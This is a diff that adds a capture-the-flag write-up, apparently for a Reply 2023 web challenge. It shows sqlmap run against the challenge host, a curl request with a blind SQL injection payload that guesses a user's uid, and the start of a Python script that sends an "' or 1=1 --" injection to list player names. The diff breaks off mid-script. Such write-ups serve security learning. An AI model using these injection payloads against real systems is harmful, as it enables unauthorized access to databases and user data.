diff --git a/challenges.reply.com-23/The_Last_Fighting_Goat/README.md b/challenges.reply.com-23/The_Last_Fighting_Goat/README.md index 2b24016..d69e7f0 100644 --- a/challenges.reply.com-23/The_Last_Fighting_Goat/README.md +++ b/challenges.reply.com-23/The_Last_Fighting_Goat/README.md @@ -8,10 +8,70 @@ The palace of the Web Realm, a gleaming place called Hypercloud, is guarded by P #### Solution: +- poking around the application revealed that one page have hidden form field +```html +
+``` +- using it with `sqlmap -u "http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof" --data "year=*" --random-agent --level 5 --risk 3 --dbs` reveals that there is SQL injection +- after long time digging and trying out different stuff we found that there is in the same table also `uid` column that could be leaked/guessed for the `top` players with `curl -vX POST 'http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof' --data "year=' or (1=1 and year=2023 and name='humming_non-smoker2003' and uid like '2%')--"` + +```python +import requests +import string + +candidates = "abcdef" + string.digits + '-' + +ses = requests.session() + +r = ses.post( + "http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof", + data={"year": "' or 1=1 --"} +) + +names = [] + +for line in r.text.splitlines(): + if '